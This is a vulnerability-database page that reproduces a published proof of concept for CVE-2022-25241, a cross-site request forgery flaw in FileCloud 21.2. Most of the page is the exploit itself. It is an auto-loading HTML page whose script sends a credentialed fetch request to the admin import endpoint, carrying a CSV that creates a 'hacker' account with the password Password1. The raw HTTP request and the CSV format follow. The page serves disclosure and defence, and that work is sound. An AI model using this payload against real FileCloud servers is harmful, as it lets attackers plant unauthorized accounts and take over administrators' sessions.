FileCloud 21.2 Cross Site Request Forgery

🗓️ 21 Feb 2022 00:00:00Reported by Masashi FujiwaraType

packetstorm🔗 packetstormsecurity.com👁 270 Views

FileCloud 21.2 Cross Site Request Forgery CVE-2022-2524

Reporter	Title	Published	Views	Family All 12
0day.today	FileCloud 21.2 - Cross-Site Request Forgery Vulnerability	21 Feb 202200:00	–	zdt
ATTACKERKB	CVE-2022-25241	16 Feb 202202:15	–	attackerkb
Circl	CVE-2022-25241	16 Feb 202207:35	–	circl
CNNVD	FileCloud 跨站请求伪造漏洞	16 Feb 202200:00	–	cnnvd
CVE	CVE-2022-25241	16 Feb 202201:26	–	cve
Cvelist	CVE-2022-25241	16 Feb 202201:26	–	cvelist
Exploit DB	FileCloud 21.2 - Cross-Site Request Forgery (CSRF)	21 Feb 202200:00	–	exploitdb
EUVD	EUVD-2022-29938	3 Oct 202520:07	–	euvd
NVD	CVE-2022-25241	16 Feb 202202:15	–	nvd
OSV	CVE-2022-25241	16 Feb 202202:15	–	osv

`# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)  
# Date: 2022-02-20  
# Exploit Author: Masashi Fujiwara  
# Vendor Homepage: https://www.filecloud.com/  
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2  
# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)  
# Tested on:  
# OS: Ubuntu 18.04.6 LTS (Docker)  
# Apache: 2.4.52  
# FileCloud: 21.2.4.17315  
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)  
  
# Conditions  
1. Only vulnerable if cookies have samesite set to None (SameSite=None).  
echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php  
2. Use https as target url (When cookies set SameSite=None, also set Secure).  
  
# PoC (HTML)  
<html>  
<head>  
<meta http-equiv="Pragma" content="no-cache">  
<meta http-equiv="Cache-Control" content="no-cache">  
  
<script>  
function init(){  
myFormData = new FormData();  
let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});  
myFormData.append("uploadFormElement", fileContent, "user.csv");  
fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});  
}  
</script>  
</head>  
<body onload="init()">  
CSRF PoC for CVE-2022-25241  
  
Creat hacker user with Password1 via CSV file upload.  
</body>  
</html>  
  
  
  
# HTTPS Request  
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1  
Host: 192.168.159.129:8443  
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493  
Content-Length: 365  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW  
Connection: close  
  
------WebKitFormBoundaryiAXsUsJ2ZV54DFuW  
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"  
Content-Type: application/vnd.ms-excel  
  
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified  
hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES  
  
------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--  
  
  
  
# CSV file format  
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified  
hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES  
  
  
`

21 Feb 2022 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.03271